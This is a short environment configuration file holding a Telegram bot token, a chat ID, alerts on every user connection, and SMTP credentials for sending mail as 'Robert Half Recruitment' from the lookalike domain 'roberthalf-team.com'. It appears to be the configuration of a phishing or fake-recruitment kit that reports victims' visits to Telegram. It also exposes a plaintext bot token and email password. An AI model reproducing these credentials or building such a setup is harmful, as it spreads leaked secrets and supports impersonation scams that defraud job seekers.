BOT="8305103864:AAGwrcz3mXs8NiZgV021ZzyccOTd6-zYOjg"
CHAT_ID="-1003679809888"
# Send Telegram Notification on each user connection
Notification_On_Connect=true
# Send Telegram Notification on each user connection
Notification_On_Disconnect=false

# Email Configuration (for nodemailer)
APP_NAME="Robert Half Recruitment"

EMAIL_HOST="smtp.office365.com"
EMAIL_PORT=587

EMAIL_USER="careers@roberthalf-team.com"
EMAIL_PASS="llcpkjrkypvtzbsq"
